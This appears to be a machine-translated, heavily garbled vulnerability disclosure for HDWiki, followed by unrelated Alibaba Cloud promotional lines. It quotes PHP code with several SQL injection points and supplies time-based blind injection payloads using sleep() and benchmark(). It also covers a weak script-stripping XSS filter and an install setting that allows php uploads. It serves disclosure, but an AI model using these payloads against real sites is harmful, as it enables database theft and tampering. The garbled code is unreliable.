HDWiki has become more secure after the baptism of the former Daniel. I can only find a few blind notes and xss dishes. PS: Do not ignore PSS: the vulnerability is your own, rank is a swordsman, so ..... you know ~. ~ Detailed Description: After the baptism of the former Daniel, it became safer and safer. get was randomly filtered out by a bunch of keywords, and get injection was almost impossible, so I only found post1control/user. php 177 function doaegis () {178 $ id = $ this-> post ['id']; // vulnerable 179 if (empty ($ id )) {180 $ this-> message (-1, '', 2); 181} 182 if ($ _ ENV [" comment "]-> is_in_cookie ('aegis ', $ id) {183 $ this-> message (-2, '', 2); 184} 185 $ _ ENV [" comment "]-> update_field ('aegis ', 1, $ id, 0); 186 $ this-> message ($ id, '', 2); 187} model/comment. c Lass. php 56 function update_field ($ field, $ value, $ id, $ type = 1) {57 if ($ type) {58 $ SQL = "UPDATE ". DB_TABLEPRE. "comment SET $ field = '$ value' WHERE id = $ id"; 59} else {60 $ SQL = "UPDATE ". DB_TABLEPRE. "comment SET $ field = $ field + $ value WHERE id = $ id"; 61} 62 $ this-> db-> query ($ SQL ); 63} submit id = 1 and if (substr (select 1), 2189) = 1, sleep (10), 1) Implement blind injection function dooppose () {190 $ id = $ this-> post ['id']; // vulnerabl E 191 if (empty ($ id) {192 $ this-> message (-1, '', 2 ); 193} 194 if ($ _ ENV ["comment"]-> is_in_cookie ('oppose ', $ id) {195 $ this-> message (-2 ,'', 2); 196} 197 $ _ ENV ["comment"]-> update_field ('oppose ', 1, $ id, 0); 198 $ this-> message ($ id, '', 2); 199} Same as above 3 control/gift. php 51 function doapply () {52/* Get the user submitted parameter */53 $ gid = $ this-> post ['gid']; // gift id // vulnerable ..................... 61 62 $ gift =$ _ ENV ['gift ']-> get ($ gid); // current gift model/gift. class. php 46 function get ($ id) {47 return $ this-> db-> fetch_first ("SELECT * FROM ". DB_TABLEPRE. "gift WHERE id = ". $ id); 48} submit gid = 1 and if (substr (select 1), 1000000000) = 1, benchmark (534534, md5 (), 1) 4 control/doc. php1021 function dodelsave () {1022 $ aid = isset ($ this-> get [2])? $ This-> get [2]: ''; 1023 if (empty ($ aid) {1024 $ aid = $ this-> post ['checkid']; // vulnerable1025 $ num = count ($ aid); 1026 if ($ num> 0) {1027 $ aids = ''; 1028 for ($ I = 0; $ I <$ num; $ I ++) {1029 $ aids. = $ aid [$ I]. ','; 1030} 1031 $ aids = substr ($ aids, 0,-1); 1032 $ _ ENV ['Doc']-> del_autosave ($ aids ); model/doc. class. php 88 function del_autosave ($ aid, $ uid = '', $ did ='') {89 if ($ aid! = '') {90 $ SQL =" DELETE FROM ". DB_TABLEPRE." autosave WHERE aid in ($ aid) "; 91} elseif ($ uid! = ''& $ Did! = '') {92 $ SQL =" DELETE FROM ". DB_TABLEPRE. "autosave WHERE uid = '$ uid' AND did =' $ did'"; 93} else {94 return false; 95} 96 return $ this-> db-> query ($ SQL); 97} checkid [] = 1) or if (substr (select 1), 1, 1) = 1, benchmark (1000000000, md5 (534534), 1 5 control/user. php 166 function doremove () {167 $ messageids = ''; 168 if ($ this-> get [2] = 'sing') {169 $ alltype = array (1, 2, 3); 170 if (is_numeric ($ this-> post ['id' ]) & In_array ($ this-> post ['type'], $ alltype )) {171 $ _ ENV ['pms ']-> update_pms ($ this-> post ['id'], $ this-> post ['type']); 172} 173} else {174 $ removeid = $ this-> post ['checkid']; // vulnerable 175 $ num = count ($ removeid ); 176 $ allowlist = array ('inbox', 'Outbox', 'drafs'); 177 if (is_array ($ removeid) & $ num> = 1 & in_array ($ this-> get [3], $ allowlist) {178 switch ($ this-> get [3]) {179 case inbox: 180 $ typ E = 1; 181 break; 182 case outbox: 183 $ type = 2; 184 break; 185 case drafts: 186 $ type = 3; 187 break; 188} 189 for ($ I = 0; $ I <$ num; $ I ++) {190 $ messageids. = $ removeid [$ I]. ','; 191} 192 $ messageids = substr ($ messageids, 0,-1); 193 $ result = $ _ ENV ['pms ']-> update_pms ($ messageids, $ type); model/pms. class. php 127 function update_pms ($ messageids, $ type) {128 $ id = strpos ($ messageids ,',')? Substr ($ messageids, 0, strpos ($ messageids, ','): $ messageids; 129 $ pms = $ this-> get_pms ($ id ); 130 if ($ pms ['delstatus'] = $ type | $ type = 3) {131 $ result = $ this-> remove ($ messageids ); 132} else {133 $ type = ($ type = 2 )? 1: 2; 134 $ result = $ this-> db-> query ("UPDATE ". DB_TABLEPRE. "pms SET delstatus = '$ type' WHERE id in ($ messageids)"); 135} 136 return $ result; 137} 139 function remove ($ messageids) {140 return ($ this-> db-> query ("delete from ". DB_TABLEPRE. "pms WHERE id in ($ messageids)"); 141} filter the source code with the same XSS-edited entry text. index. php? Doc-view-51 $ doc ['content'] = string: stripscript ($ _ ENV ['Doc']-> replace_danger_word ($ this-> post ['content']); 227 function stripscript ($ string) {228 $ pregfind = array ("/<script. *>. * <\/script>/siU ", '/on (mousewheel | mouseover | click | load | onload | submit | focus | blur) = "[^"] * "/I '); 229 $ pregreplace = array ('', '',); 230 $ string = preg_replace ($ pregfind, $ pregreplace, $ string); 231 return $ string; 232} It is a small problem to remove sensitive words in the body and then use key and dangerous tags. /install. php: 578: ('attachment _ type ', 'jpg | jpeg | bmp | gif | png | gz | bz2 | zip | rar | doc | ppt | mp3 | xls | txt | swf | flv | php | pdf '), during installation, php is also added to the file format that can be uploaded. By default, attachments are not uploaded, which is not very harmful. It seems a bit difficult. Proof of vulnerability: solution ::)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
